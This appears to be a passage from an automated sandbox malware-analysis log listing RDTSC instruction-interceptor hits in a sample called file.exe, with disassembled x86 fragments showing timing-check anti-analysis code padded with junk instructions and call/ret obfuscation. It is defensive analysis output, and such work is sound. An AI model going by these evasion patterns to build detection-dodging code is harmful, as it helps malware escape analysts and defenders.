                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6282 second address: 4F62A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8B150D74F1h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F8B150D74E8h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F62A7 second address: 4F62AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F62AD second address: 4F62B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F62B1 second address: 4F62C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F62C1 second address: 4F62C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F62C5 second address: 4F62CF instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F62CF second address: 4F62D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F62D5 second address: 4F62D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F62D9 second address: 4F6320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F8B150D74F8h 0x00000014 pop eax 0x00000015 mov edi, ebx 0x00000017 call 00007F8B150D74E9h 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007F8B150D74ECh 0x00000024 jl 00007F8B150D74E6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6320 second address: 4F6369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b ja 00007F8B146BCD69h 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 ja 00007F8B146BCD5Ch 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F67FA second address: 4F67FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F67FE second address: 4F6804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F68C0 second address: 4F68C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6A16 second address: 4F6A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6A1A second address: 4F6A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6FAF second address: 4F6FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6FB3 second address: 4F6FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6FB9 second address: 4F6FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7058 second address: 4F705C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F705C second address: 4F7062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7433 second address: 4F7437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7437 second address: 4F7467 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8B146BCD64h 0x0000000e pushad 0x0000000f jmp 00007F8B146BCD60h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F762F second address: 4F7635 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7635 second address: 4F763B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8B56 second address: 4F8B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F90F4 second address: 4F9163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007F8B146BCD5Eh 0x0000000e pop ecx 0x0000000f nop 0x00000010 pushad 0x00000011 mov ebx, dword ptr [ebp+122D282Dh] 0x00000017 jg 00007F8B146BCD5Ah 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F8B146BCD58h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov edi, dword ptr [ebp+122D2B31h] 0x00000040 push 00000000h 0x00000042 mov esi, 31BE0061h 0x00000047 jl 00007F8B146BCD5Ch 0x0000004d sub esi, dword ptr [ebp+122D1BC1h] 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F9163 second address: 4F916D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8B150D74E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F9B3C second address: 4F9B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8B146BCD56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB791 second address: 4FB797 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB797 second address: 4FB79D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB79D second address: 4FB81F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007F8B150D74EEh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F8B150D74E8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dword ptr [ebp+12460404h], edx 0x00000030 mov dword ptr [ebp+122D1CBAh], ecx 0x00000036 push 00000000h 0x00000038 movsx esi, cx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F8B150D74E8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F8B150D74F7h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB553 second address: 4FB559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB559 second address: 4FB55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB55D second address: 4FB561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FBFF6 second address: 4FBFFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCDA2 second address: 4FCDA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCDA6 second address: 4FCDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCB59 second address: 4FCB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD5F6 second address: 4FD5FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504687 second address: 50468B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505692 second address: 5056A6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8B150D74E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5056A6 second address: 5056AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50479B second address: 5047AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5047AB second address: 5047B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5047B0 second address: 504833 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B150D74F8h 0x00000008 jmp 00007F8B150D74F2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+122D2889h] 0x00000016 mov dword ptr [ebp+12482082h], esi 0x0000001c push dword ptr fs:[00000000h] 0x00000023 sub dword ptr [ebp+122D1C62h], esi 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 sub dword ptr [ebp+122D1BCFh], eax 0x00000036 jnl 00007F8B150D74EEh 0x0000003c jo 00007F8B150D74E8h 0x00000042 push eax 0x00000043 pop ebx 0x00000044 mov eax, dword ptr [ebp+122D0EF1h] 0x0000004a mov bh, BDh 0x0000004c push FFFFFFFFh 0x0000004e mov bx, 84DDh 0x00000052 nop 0x00000053 jbe 00007F8B150D74FEh 0x00000059 push eax 0x0000005a push edi 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505857 second address: 5058FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F8B146BCD58h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F8B146BCD58h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 sbb edi, 060D4AEEh 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 jmp 00007F8B146BCD68h 0x00000055 mov eax, dword ptr [ebp+122D1509h] 0x0000005b push eax 0x0000005c mov ebx, dword ptr [ebp+122D3927h] 0x00000062 pop edi 0x00000063 push FFFFFFFFh 0x00000065 mov dword ptr [ebp+122D18F7h], edx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F8B146BCD5Fh 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5067E2 second address: 506821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74F9h 0x00000009 popad 0x0000000a jne 00007F8B150D74E8h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8B150D74F3h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506821 second address: 506825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506825 second address: 50682B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50AEFA second address: 50AEFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50AEFE second address: 50AF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F8B150D74E8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jne 00007F8B150D74ECh 0x00000028 push 00000000h 0x0000002a mov bh, dl 0x0000002c push 00000000h 0x0000002e mov edi, 5C9AF717h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50AF40 second address: 50AF53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B179 second address: 50B17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E130 second address: 50E136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E136 second address: 50E13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D217 second address: 50D21D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D21D second address: 50D223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E13A second address: 50E1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F8B146BCD58h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 movsx ebx, cx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F8B146BCD58h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 push ebx 0x00000045 mov dword ptr [ebp+122D26ACh], eax 0x0000004b pop edi 0x0000004c call 00007F8B146BCD61h 0x00000051 xor bh, 00000040h 0x00000054 pop edi 0x00000055 push 00000000h 0x00000057 mov ebx, dword ptr [ebp+124655DAh] 0x0000005d push eax 0x0000005e jc 00007F8B146BCD60h 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510360 second address: 510364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5111B7 second address: 5111BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5111BB second address: 5111BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51127C second address: 511283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513326 second address: 513331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8B150D74E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5123D7 second address: 5123DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51345A second address: 51345F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51345F second address: 5134C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D2C63h], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F8B146BCD58h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov bx, di 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c cmc 0x0000003d mov eax, dword ptr [ebp+122D0B95h] 0x00000043 mov bh, 2Ah 0x00000045 push FFFFFFFFh 0x00000047 mov dword ptr [ebp+122D1DE7h], ecx 0x0000004d nop 0x0000004e jng 00007F8B146BCD6Dh 0x00000054 push eax 0x00000055 push edx 0x00000056 jno 00007F8B146BCD56h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5134C6 second address: 5134DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F8B150D74EEh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515200 second address: 515222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515222 second address: 515227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514408 second address: 51440C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51440C second address: 514410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515227 second address: 51522D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519CCA second address: 519CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519CCE second address: 519CD8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519CD8 second address: 519CE2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B150D74ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51DE4C second address: 51DE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8B146BCD66h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51DE6D second address: 51DE75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51DE75 second address: 51DE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521177 second address: 52117B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A844C second address: 4A8453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8453 second address: 4A8467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8B150D74EEh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8467 second address: 4A846B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FBFF2 second address: 4FBFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A404 second address: 52A422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F8B146BE726h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52ADCF second address: 52ADFD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B14C5BA96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F8B14C5BAABh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52ADFD second address: 52AE03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AF3F second address: 52AF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AF43 second address: 52AF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
